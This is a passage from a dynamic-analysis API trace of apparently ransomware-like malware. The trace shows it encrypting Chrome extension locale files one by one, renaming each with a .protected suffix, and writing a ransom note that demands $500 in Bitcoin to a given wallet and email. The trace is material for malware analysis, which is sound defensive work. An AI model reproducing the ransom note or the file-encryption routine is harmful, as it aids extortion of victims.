[0078.948] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.948] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.948] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.948] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.948] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0078.949] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.949] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0078.949] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.949] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.949] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.949] CloseHandle (hObject=0x168) returned 1 [0078.949] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.protected") returned 168 [0078.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json.protected")) returned 1 [0078.950] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.950] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.950] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\RESTORE_FILES.txt") returned 162 [0078.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.951] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.951] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.952] lstrlenA (lpString="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") returned 684 [0078.952] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.952] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.952] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.952] CloseHandle (hObject=0x164) returned 1 [0078.952] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.952] lstrcmpiW (lpString1="en_US", lpString2="Windows") returned -1 [0078.952] lstrcmpiW (lpString1="en_US", lpString2="Program Files") returned -1 [0078.952] lstrcmpiW (lpString1="en_US", lpString2="Program Files (x86)") returned -1 [0078.952] lstrcmpiW (lpString1="en_US", lpString2="$Recycle.bin") returned 1 [0078.952] lstrcmpiW (lpString1="en_US", lpString2="System Volume Information") returned -1 [0078.952] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US") returned 144 [0078.952] lstrcmpW (lpString1="en_US", lpString2=".") returned 1 [0078.952] lstrcmpW (lpString1="en_US", lpString2="..") returned 1 [0078.952] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\*") returned 146 [0078.952] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.952] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.952] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.952] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.952] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.952] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.952] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\.") returned 146 [0078.952] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.952] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.953] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.953] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.953] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.953] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.953] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.953] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\..") returned 147 [0078.953] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.953] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.953] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.953] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned 
-1 [0078.953] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.953] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.953] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.953] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.953] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.953] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.953] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.953] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.953] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.953] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.954] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 
[0078.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.954] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.954] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.954] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0078.955] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.955] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0078.955] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.955] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.955] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.955] CloseHandle (hObject=0x168) returned 1 [0078.955] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.protected") returned 168 [0078.955] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json.protected")) returned 1 [0078.956] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.956] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.956] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\RESTORE_FILES.txt") returned 162 [0078.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.956] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.956] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.957] lstrlenA (lpString="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") returned 684 [0078.957] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.957] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.957] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.957] CloseHandle (hObject=0x164) returned 1 [0078.957] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.957] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0078.957] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0078.957] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0078.958] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0078.958] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0078.958] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es") returned 141 [0078.958] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0078.958] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0078.958] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\*") returned 143 [0078.958] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.958] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.958] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.958] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.958] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.958] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.958] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\.") returned 143 [0078.958] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.958] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.958] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.958] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.958] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.958] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.958] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.958] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\..") returned 144 [0078.958] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.958] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.958] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.958] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0078.958] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.958] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.958] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.958] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.958] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.958] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.958] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.958] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.958] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.959] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.959] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.959] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.959] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.959] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.959] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.959] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0078.960] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.960] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0078.960] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.960] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.961] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.961] CloseHandle (hObject=0x168) returned 1 [0078.961] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.protected") returned 165 [0078.961] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 